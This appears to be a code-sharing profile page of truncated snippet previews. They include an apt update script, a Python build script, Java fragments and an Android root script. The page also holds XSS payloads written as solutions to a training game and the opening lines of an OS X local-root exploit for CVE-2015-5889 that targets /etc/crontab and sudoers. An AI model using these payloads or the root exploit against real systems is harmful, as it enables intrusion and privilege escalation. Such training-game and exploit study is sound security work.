View python.sh
wget https://www.python.org/ftp/python/3.4.2/Python-3.4.2.tgz
tar xvf Python-3.4.2.tgz
cd Python-3.4.2
./configure
make
make test
sudo make install
cd ..
rm -rf Python-3.4.2
rm Python-3.4.2.tgz
View xss-game-solutions.txt
These are my solutions to http://xss-game.appspot.com/. I did not use any hints on these, but I took a while on the last two.
[Level 1]: Search for the string.
<script>alert(1)</script>
[Level 2]: Post the string
<img src=x onerror=javascript:alert(1)></img>
[Level 3]: Navigate to the URL
http://xss-game.appspot.com/level3/frame#1' onerror="javascript:alert(1)"
View ChaosWebs.java
import java.util.*;
import java.util.regex.Pattern;
import java.net.*;
import java.io.*;
public class ChaosWebs {
public static double time = 6 * 60 * 60 * 1000;
public static String filename = ".last_post.txt";
public static void main(String[] args) {
View ctf
==QPJJjYxJ0UapGbtJmCNUEb4JXdY9Cbn5ybvd2LvoDc0RHa
View Main.java
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;
public class Main {
public static void main(String[] args) throws Exception {
View exploit.py
# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root
import os,time,sys
env = {}
s = os.stat("/etc/sudoers").st_size
env['MallocLogFile'] = '/etc/crontab'
env['MallocStackLogging'] = 'yes'
View root.sh
#!/bin/bash
# Give the usual warning.
clear;
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
clear;
# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";
View permissions.txt
android.permission.ACCESS_ALL_DOWNLOADS
android.permission.ACCESS_BLUETOOTH_SHARE
android.permission.ACCESS_CACHE_FILESYSTEM
android.permission.ACCESS_CHECKIN_PROPERTIES
android.permission.ACCESS_CONTENT_PROVIDERS_EXTERNALLY
android.permission.ACCESS_DOWNLOAD_MANAGER
android.permission.ACCESS_DOWNLOAD_MANAGER_ADVANCED
android.permission.ACCESS_DRM_CERTIFICATES
android.permission.ACCESS_EPHEMERAL_APPS
android.permission.ACCESS_FM_RADIO
View Main.java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.Socket;
import java.util.Scanner;
public class Main {
public static void main(String[] args) {
View update.sh
# Arinerron's update script
# License: Nope. This code is easily recreatable, and I spent like 5 minutes writing it. I couldn't care less if you claimed this code as your or somehow made millions off of this or whatever. Have fun. :P
export COLOR_NC='\e[0m';
export COLOR_GREEN='\e[0;32m';
clear;
echo -e "$COLOR_GREEN""[Update] ""$COLOR_NC""Updating package listing...";
sudo apt-get -qq update;
echo -e "$COLOR_GREEN""[Update] ""$COLOR_NC""Upgrading software...";